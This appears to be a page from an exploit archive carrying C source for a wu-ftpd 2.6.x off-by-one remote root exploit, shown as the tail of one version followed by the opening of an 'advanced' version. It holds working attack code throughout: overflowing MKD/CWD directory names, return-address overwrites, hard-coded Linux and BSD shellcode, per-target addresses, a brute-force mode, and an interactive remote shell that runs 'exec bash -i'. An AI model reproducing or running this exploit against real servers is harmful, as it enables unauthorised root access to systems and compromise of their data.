};

void prcode_usage(char *f_nm)
{
int r_n=(NRL);
fprintf(stdout," Usage: %s -options arguments\n\n",f_nm);
fprintf(stdout," \t-h [hostname] : Target hostname & ip.\n");
fprintf(stdout," \t-u [userid] : User id.\n");
fprintf(stdout," \t-p [passwd] : User password.\n");
fprintf(stdout," \t-n [port num] : Target port number.\n");
fprintf(stdout," \t-s [shelladdr] : Shellcode address.\n");
fprintf(stdout," \t-b : Brute-Force mode.\n");
fprintf(stdout," \t-m [max num] : Brute-Force Count number.\n");
fprintf(stdout," \t-i : help information.\n");
fprintf(stdout," \t-t [target num] : Select target number.\n\n");
for(r_n=(NRL);plat[r_n].v_nm!=(NULL);r_n++)
{
fprintf(stdout," \t\t{%d} %s.\n",(plat[r_n].num),(plat[r_n].v_nm));
}
fprintf(stdout,"\n Example: %s -hlocalhost -ux82 -px82 -n21 -t0\n\n",f_nm);
exit(FAD);
}

u_long null_chk(u_long sh_addr)
{
if((sh_addr>>(NRL)&0xff)==(0x00))
{
return(sh_addr+=(SCS));
}
else return(sh_addr);
}

void ftpd_login(int sock,char *user,char *pass)
{
char send_recv[(GET_R)];

(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

if(!strstr(send_recv,(FTP_CONN_SCS)))
{
fprintf(stdout," [-] ftpd connection failure.\n\n");
close(sock);
exit(FAD);
}
else fprintf(stdout," [*] ftpd connection success.\n");
fprintf(stdout," [+] User id input.\n");

memset((char *)send_recv,(NRL),sizeof(send_recv));
snprintf(send_recv,sizeof(send_recv)-1,"USER %s\r\n",user);
send(sock,send_recv,strlen(send_recv),(NRL));

(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

if(!strstr(send_recv,(FTP_USER_FAD)))
{
fprintf(stdout," [-] User id input failure.\n\n");
close(sock);
exit(FAD);
}
else fprintf(stdout," [+] User password input.\n");

memset((char *)send_recv,(NRL),sizeof(send_recv));
snprintf(send_recv,sizeof(send_recv)-1,"PASS %s\r\n",pass);
send(sock,send_recv,strlen(send_recv),(NRL));

(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

if(strstr(send_recv,(FTP_LOGIN_FAD)))
{
fprintf(stdout," [-] FAILED LOGIN on %s.\n\n",user);
close(sock);
exit(FAD);
}
else if(strstr(send_recv,(FTP_LOGIN_SCS)))
{
fprintf(stdout," [*] User %s logged in.\n",user);
}
else
{
fprintf(stdout," [-] ftpd handshake failure.\n\n");
close(sock);
exit(FAD);
}
return;
}

int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character)
{
int dr_n=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];

memset((char *)dir_nm,(NRL),(GET_R));
/* MKD command */
dir_nm[cmd_f++]=(0x4d);
dir_nm[cmd_f++]=(0x4b);
dir_nm[cmd_f++]=(0x44);
dir_nm[cmd_f++]=(0x20);

for(dr_n=(cmd_f);dr_n<(DEF_VA)+(cmd_f);dr_n++)
{
dir_nm[dr_n]=(gb_character);
}
dir_nm[dr_n++]=(0x0d);
dir_nm[dr_n++]=(0x0a);

if(type)
{
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD command failed.\n\n");
exit(FAD);
}
}
/* CWD command: reuse the same 255-byte name to enter the directory just created */
cmd_f=(NRL);
dir_nm[cmd_f++]=(0x43);
dir_nm[cmd_f++]=(0x57);
dir_nm[cmd_f++]=(0x44);

send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] CWD command failed.\n\n");
exit(FAD);
}
return 0;
}

int send_shellcode(int sock,int type,char *dir_nm)
{
int dr_n=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];

memset((char *)dir_nm,(NRL),(GET_R));
/* MKD command */
dir_nm[cmd_f++]=(0x4d);
dir_nm[cmd_f++]=(0x4b);
dir_nm[cmd_f++]=(0x44);
dir_nm[cmd_f++]=(0x20);

for(dr_n=(cmd_f);dr_n<(DEF_VA)+sizeof(0xffffffff)+(cmd_f)-strlen(shellcode_ffx2);dr_n++)
{
dir_nm[dr_n]=(DEF_NOP);
}
for(cmd_f=(NRL);cmd_f<strlen(shellcode_ffx2);cmd_f++)
{
dir_nm[dr_n++]=shellcode_ffx2[cmd_f];
}
dir_nm[dr_n++]=(0x0d);
dir_nm[dr_n++]=(0x0a);

if(type)
{
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD shellcode_dir failed.\n\n");
exit(FAD);
}
}
/* CWD command: enter the directory whose name carries the NOP sled and shellcode */
cmd_f=(NRL);
dir_nm[cmd_f++]=(0x43);
dir_nm[cmd_f++]=(0x57);
dir_nm[cmd_f++]=(0x44);

send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,(GET_R)-1,(NRL));

if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] CWD shellcode_dir failed.\n\n");
exit(FAD);
}
return 0;
}

void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
{
char atk_bf[(GET_R)];
{
fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41)); /* 01 */
fprintf(stdout," [+] 02: make shell-code directory.\n");
(int)send_shellcode(sock,d_type,(atk_bf)); /* 02 */
fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43)); /* 03 */
fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44)); /* 04 */
fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45)); /* 05 */
fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46)); /* 06 */
fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47)); /* 07 */
fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48)); /* 08 */
fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49)); /* 09 */
fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50)); /* 10 */
fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51)); /* 11 */
fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52)); /* 12 */
fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53)); /* 13 */
fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54)); /* 14 */
fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55)); /* 15 */
(int)make_retloc(sock,type,(atk_bf),sh_addr); /* 16 */
}
return;
}

int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr)
{
int r_rn_1=(NRL),r_rn_2=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];

memset((char *)atk_bf,(NRL),(GET_R));
if(type) /* MKD command */
{
atk_bf[cmd_f++]=(0x4d);
atk_bf[cmd_f++]=(0x4b);
atk_bf[cmd_f++]=(0x44);
atk_bf[cmd_f++]=(0x20);
}
else /* RMD command */
{
atk_bf[cmd_f++]=(0x52);
atk_bf[cmd_f++]=(0x4d);
atk_bf[cmd_f++]=(0x44);
atk_bf[cmd_f++]=(0x20);
}
for(r_rn_1=(cmd_f),r_rn_2=(NRL);r_rn_2<(DEF_VA)-strlen(home_dir)-(DEF_ANSH);r_rn_2++)
atk_bf[r_rn_1++]=(0x41);
{
*(long *)&atk_bf[r_rn_1]=(sh_addr);
r_rn_1+=(DEF_ALIGN);
*(long *)&atk_bf[r_rn_1]=(sh_addr);
r_rn_1+=(DEF_ALIGN);
atk_bf[r_rn_1++]=(0x41);
atk_bf[r_rn_1++]=(0x41);
atk_bf[r_rn_1++]=(0x41);
atk_bf[r_rn_1++]=(0x0d);
atk_bf[r_rn_1++]=(0x0a);
}
send(sock,atk_bf,strlen(atk_bf),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

if(type) /* MKD command */
{
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD &shellcode_dir failed.\n\n");
exit(FAD);
}
else fprintf(stdout," [+] Ok, MKD &shellcode_dir.\n");
}
else /* RMD command */
{
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] RMD &shellcode_dir failed.\n\n");
exit(FAD);
}
else fprintf(stdout," [+] Ok, RMD &shellcode_dir.\n");
}
return 0;
}

int main(int argc,char *argv[])
{
int opt_g,sock,__bf=(NRL);
int mx_bf=(MAX_BF),bf_lsz=(BF_LSZ);
char user_id[(DEF_VA)]=(DEF_STR);
char pass_wd[(DEF_VA)]=(DEF_STR);
char tg_host[(DEF_VA)]=(DEF_HOST);
int tg_port=(DEF_PORT);
u_long sh_addr=(plat[t_g].sh_addr);

(void)banrl();
while((opt_g=getopt(argc,argv,"M:m:H:h:U:u:P:p:N:n:S:s:T:t:BbIi"))!=EOF)
{
extern char *optarg;
switch(opt_g)
{
case 'M':
case 'm':
mx_bf=(atoi(optarg));
bf_lsz=((0x1000)/mx_bf);
break;

case 'H':
case 'h':
memset((char *)tg_host,(NRL),sizeof(tg_host));
strncpy(tg_host,optarg,sizeof(tg_host)-1);
break;

case 'U':
case 'u':
memset((char *)user_id,(NRL),sizeof(user_id));
strncpy(user_id,optarg,sizeof(user_id)-1);
break;

case 'P':
case 'p':
memset((char *)pass_wd,(NRL),sizeof(pass_wd));
strncpy(pass_wd,optarg,sizeof(pass_wd)-1);
break;

case 'N':
case 'n':
tg_port=(atoi(optarg));
break;

case 'S':
case 's':
sh_addr=strtoul(optarg,(NRL),(NRL));
break;

case 'T':
case 't':
if((t_g=(atoi(optarg)))<(3))
sh_addr=(plat[t_g].sh_addr);
else (void)prcode_usage(argv[(NRL)]);
break;

case 'B':
case 'b':
__bf=(SCS);
break;

case 'I':
case 'i':
(void)prcode_usage(argv[(NRL)]);
break;

case '?':
(void)prcode_usage(argv[(NRL)]);
break;
}
}
if(!strcmp(user_id,(DEF_STR))||!strcmp(pass_wd,(DEF_STR)))
(void)prcode_usage(argv[(NRL)]);

memset((char *)home_dir,(NRL),sizeof(home_dir));
snprintf(home_dir,sizeof(home_dir)-1,"%s%s",(HOME_DIR),user_id);

if(!__bf)
{
fprintf(stdout," [*] Target: %s.\n",(plat[t_g].v_nm));
fprintf(stdout," [+] address: %p.\n",sh_addr);
fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);

sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");

fprintf(stdout," [1] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);

fprintf(stdout," [2] send exploit code.\n");
(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
close(sock);

fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);

sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");

fprintf(stdout," [3] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);

fprintf(stdout," [4] send exploit code.\n");
(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));

fprintf(stdout," [5] Waiting, execute the shell ");
fflush(stdout);
(u_int)sleep(SCS);

fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);

fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);

fprintf(stdout,".\n");
(void)conn_shell(sock);
close(sock);
}
else
{
int bt_num=(NRL);
t_g=(4);
sh_addr=(plat[t_g].sh_addr);
fprintf(stdout," [*] Brute-Force mode.\n");
fprintf(stdout," [+] BF Count: %d.\n",mx_bf);
fprintf(stdout," [+] BF Size: +%d.\n\n",bf_lsz);

for(bt_num=(NRL);bt_num<(mx_bf);bt_num++)
{
sh_addr=(u_long)null_chk(sh_addr);
fprintf(stdout," [+] Brute-Force address: %p.\n",sh_addr);
fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);

sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");

fprintf(stdout," [1] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);

fprintf(stdout," [2] send exploit code.\n");
if(bt_num==(NRL))
{
(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
}
else
{
(void)make_send_exploit(sock,(SCS),sh_addr,(NRL));
}
close(sock);

fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);

sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");

fprintf(stdout," [3] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);

fprintf(stdout," [4] send exploit code.\n");
(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));

fprintf(stdout," [5] Waiting, execute the shell ");
fflush(stdout);
(u_int)sleep(SCS);

fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);

fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);

fprintf(stdout,".\n");
(void)conn_shell(sock);
close(sock);

sh_addr+=(bf_lsz);
}
}
exit(NRL);
}

int setsock(char *u_host,int u_port)
{
int sock;
struct hostent *sxp;
struct sockaddr_in sxp_addr;

if((sxp=gethostbyname(u_host))==(GET_HOST_NM_ERR))
{
return(FAD);
}
if((sock=socket(AF_INET,SOCK_STREAM,(NRL)))==(FAD))
{
return(FAD);
}
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons(u_port);
sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
bzero(&(sxp_addr.sin_zero),(SIN_ZR_SIZE));

if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==(FAD))
{
return(FAD);
}
return(sock);
}

void conn_shell(int conn_sock)
{
int died;
int ex_t=(NRL);
char *command=(DEF_COMM);
char readbuf[(GET_R)];
fd_set rset;

memset((char *)readbuf,(NRL),sizeof(readbuf));
fprintf(stdout," [*] Send, command packet !\n\n");
send(conn_sock,command,strlen(command),(NRL));

for(;;)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(conn_sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(conn_sock+1,&rset,NULL,NULL,NULL);

if(FD_ISSET(conn_sock,&rset))
{
died=read(conn_sock,readbuf,sizeof(readbuf)-1);
if(died<=(NRL))
{
if(!ex_t)
return;
else
exit(NRL);
}
readbuf[died]=(NRL);
fprintf(stdout,"%s",readbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
if(died>(NRL))
{
readbuf[died]=(NRL);
if(strstr(readbuf,"exit"))
ex_t=(SCS);
write(conn_sock,readbuf,died);
}
}
}
return;
}

void re_connt(int st_sock_va)
{
if(st_sock_va==(FAD))
{
fprintf(stdout," [ Fail ]\n\n");
exit(FAD);
}
}

void banrl()
{
fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}

/* eoc */

// milw0rm.com [2003-08-03]
		

- Vulnerability information (78)

wu-ftpd 2.6.2 Remote Root Exploit (advanced version) (EDBID:78)
linux remote
2003-08-11 Verified
21 Xpl017Elz
N/A
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
** 
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
**
** Update: 
**         [v0.0.2] August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
**         [v0.0.3] August 3, Brute-Force function addition.
**         [v0.0.4] August 4, Added FreeBSD, OpenBSD version wu-ftpd-2.6.x exploit.
**                                    It will be applied well to most XxxxBSD.
**         [v0.0.5] August 4, Remote scan & exploit test function addition.
**                     August 6, Cleaning.
**
*/

#define VERSION "v0.0.5"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH_LINUX 15
#define DEF_ANSH_FRBSD 55
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR_LINUX "/home/"
#define HOME_DIR_FRBSD "/usr/home/"
#define HOME_DIR_OPBSD "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
#define DEF_COMM_OB "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec sh -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"
#define CMD_ERROR "500"

void ftpd_login(int sock,char *user,char *pass);
void conn_shell(int conn_sock,u_long scs_addr);
int setsock(char *u_host,int u_port);
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
int send_shellcode(int sock,int type,char *dir_nm);
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
u_long null_chk(u_long sh_addr);
void banrl();
int bscann(char *chk_ban);
int check_exp(int sock);

struct os
{
	int num;
	char *v_nm;
	u_long sh_addr;
	u_long bf_addr;
	char *shellcode;
	int off_st;
	char *home;
};
int t_g=(NRL);
char home_dir[(DEF_VA)]; /* user home directory offset */
int __exp_test=(NRL); /* check exploit test */
int b_scan=(NRL); /* banner check */
/*
** `0xff' uses two times to be realized in our shellcode.
*/
char lnx_shellcode_ffx2[]=
	/* setuid/chroot-break/execve shellcode by Lam3rZ */
	"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89"
	"\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01"
	"\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
	"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9"
	"\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31"
	"\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
	"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
	"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0"
	"\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
	"\x2e\x2e\x31\x31";

char bsd_shellcode_ffx2[]=
	/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
	"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
	"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
	"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0\x88"
	"\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80\x31"
	"\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31"
	"\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75\xf1"
	"\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd\x80"
	"\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
	"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
	"\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53\x53"
	"\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30"
	"\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x69\x6e"
	"\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x65\x2e"
	"\x63\x6f\x6d";

struct os plat[]=
{
	/*
	** I enjoy version up, will not share more. :-}
	*/
	{
		0,"RedHat Linux 6.x Version wu-2.6.0 compile",0x0806a59c,
		0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
	},
	{
		1,"RedHat Linux 6.x Version wu-2.6.1 compile",0x0806aad8,
		0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
	},
	{
		2,"RedHat Linux 6.x Version wu-2.6.2 compile",0x0806aa60,
		0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
	},
	{
		3,"FreeBSD 4.6.2-RELEASE Version wu-2.6.0 compile",0x0806b826,
		0x0806b026,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_FRBSD)
	},
	{
		4,"FreeBSD 4.6.2-RELEASE Version wu-2.6.1 compile",0x0806cb36,
		0x0806c036,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_FRBSD)
	},
	{
		5,"FreeBSD 4.6.2-RELEASE Version wu-2.6.2 compile",0x0806ccaa,
		0x0806c082,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_FRBSD)
	},
	{
		6,"OpenBSD 3.0 Version wu-2.6.0 compile",0xdfbfc8f8,
		0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_OPBSD)
	},
	{
		7,"OpenBSD 3.0 Version wu-2.6.1 compile",0xdfbfc8f8,
		0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_OPBSD)
	},
	{
		8,"OpenBSD 3.0 Version wu-2.6.2 compile",0xdfbfc8f8,
		0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_OPBSD)
	},
	{
		0x82,NULL,0x0,0x0,NULL,0,NULL
	}
};

void prcode_usage(char *f_nm)
{
	int r_n=(NRL);
	fprintf(stdout," Usage: %s -options arguments\n\n",f_nm);
	fprintf(stdout," \t-h [hostname]   : Target hostname & ip.\n");
	fprintf(stdout," \t-u [userid]     : User id.\n");
	fprintf(stdout," \t-p [passwd]     : User password.\n");
	fprintf(stdout," \t-n [port num]   : Target port number.\n");
	fprintf(stdout," \t-s [shelladdr]  : Shellcode address.\n");
	fprintf(stdout," \t-m [max num]    : Brute-Force Count number.\n");
	fprintf(stdout," \t-i              : help information.\n");
	fprintf(stdout," \t-q              : banner scan mode.\n");
	fprintf(stdout," \t-c              : check exploit test.\n");
	fprintf(stdout," \t-t [target num] : Select target number.\n");
	fprintf(stdout," \t-b [target num] : Brute-Force mode. (Select target number)\n\n");
	for(r_n=(NRL);plat[r_n].v_nm!=(NULL);r_n++)
	{
		fprintf(stdout," \t\t{%d} %s.\n",(plat[r_n].num),(plat[r_n].v_nm));
	}
	fprintf(stdout,"\n Example1: %s -hlocalhost -ux82 -px82 -n21 -t0",f_nm);
	fprintf(stdout,"\n Example2: %s -hwu_sub -ux82 -px82 -n21 -b0",f_nm);
	fprintf(stdout,"\n Example3: %s -h0 -ux82 -px82 -qc -t0\n\n",f_nm);
	exit(FAD);
}

u_long null_chk(u_long sh_addr)
{
	int chk_0x2f=(NRL);
	for(chk_0x2f=(NRL);chk_0x2f<0x20;chk_0x2f+=(DEF_ALIGN*2))
	{
		if((sh_addr>>(chk_0x2f)&0xff)==(0x2f))
		{
			fprintf(stderr," [-] slash was included to &shellcode address.\n\n");
			exit(FAD);
		}
	}
	if((sh_addr>>(NRL)&0xff)==(0x00))
	{
		return(sh_addr+=(SCS));
	}
	else return(sh_addr);
}

int bscann(char *chk_ban)
{
	fprintf(stdout,"\n [+] Checking, banner ...\n");
	if(strstr(chk_ban,"wu-2.6.0"))
	{
		fprintf(stdout," [*] [wu-ftpd-2.6.0]: This is version that exploit is possible.\n\n");
		return(SCS);
	}
	else if(strstr(chk_ban,"wu-2.6.1"))
	{
		fprintf(stdout," [*] [wu-ftpd-2.6.1]: This is version that exploit is possible.\n\n");
		return(SCS);
	}
	else if(strstr(chk_ban,"wu-2.6.2"))
	{
		fprintf(stdout," [*] [wu-ftpd-2.6.2]: This is version that exploit is possible.\n\n");
		return(SCS);
	}
	else
	{
		fprintf(stdout," [x] This version does not support exploit.\n");
		return(FAD);
	}
}

void ftpd_login(int sock,char *user,char *pass)
{
	char send_recv[(GET_R)];

	(u_int)sleep(SCS);
	memset((char *)send_recv,(NRL),sizeof(send_recv));
	recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

	if(b_scan)
	{
		b_scan=(NRL);
		if(((int)bscann(send_recv))==(FAD))
		{
			fprintf(stdout," [-] exploit stop.\n\n");
			exit(FAD);
		}
	}
	if(!strstr(send_recv,(FTP_CONN_SCS)))
	{
		fprintf(stdout," [-] ftpd connection failure.\n\n");
		close(sock);
		exit(FAD);
	}
	else fprintf(stdout," [*] ftpd connection success.\n");
	fprintf(stdout," [+] User id input.\n");

	memset((char *)send_recv,(NRL),sizeof(send_recv));
	snprintf(send_recv,sizeof(send_recv)-1,"USER %s\r\n",user);
	send(sock,send_recv,strlen(send_recv),(NRL));

	(u_int)sleep(SCS);
	memset((char *)send_recv,(NRL),sizeof(send_recv));
	recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

	if(!strstr(send_recv,(FTP_USER_FAD)))
	{
		fprintf(stdout," [-] User id input failure.\n\n");
		close(sock);
		exit(FAD);
	}
	else fprintf(stdout," [+] User password input.\n");

	memset((char *)send_recv,(NRL),sizeof(send_recv));
	snprintf(send_recv,sizeof(send_recv)-1,"PASS %s\r\n",pass);
	send(sock,send_recv,strlen(send_recv),(NRL));

	(u_int)sleep(SCS);
	memset((char *)send_recv,(NRL),sizeof(send_recv));
	recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

	if(strstr(send_recv,(FTP_LOGIN_FAD)))
	{
		fprintf(stdout," [-] FAILED LOGIN on %s.\n\n",user);
		close(sock);
		exit(FAD);
	}
	else if(strstr(send_recv,(FTP_LOGIN_SCS)))
	{
		fprintf(stdout," [*] User %s logged in.\n",user);
	}
	else
	{
		fprintf(stdout," [-] ftpd handshake failure.\n\n");
		close(sock);
		exit(FAD);
	}
	return;
}

int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character)
{
	int dr_n=(NRL),cmd_f=(NRL);
	char get_nm[(GET_R)];

	memset((char *)dir_nm,(NRL),(GET_R));
	/* MKD command */
	dir_nm[cmd_f++]=(0x4d);
	dir_nm[cmd_f++]=(0x4b);
	dir_nm[cmd_f++]=(0x44);
	dir_nm[cmd_f++]=(0x20);

	for(dr_n=(cmd_f);dr_n<(DEF_VA)+(cmd_f);dr_n++)
	{
		dir_nm[dr_n]=(gb_character);
	}
	dir_nm[dr_n++]=(0x0d);
	dir_nm[dr_n++]=(0x0a);

	if(type)
	{
		send(sock,dir_nm,strlen(dir_nm),(NRL));
		(u_int)sleep(SCS);
		memset((char *)get_nm,(NRL),sizeof(get_nm));
		recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

		if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
		{
			fprintf(stdout," [-] MKD command failed.\n\n");
			exit(FAD);
		}
	}
	/* CMD command */
	cmd_f=(NRL);
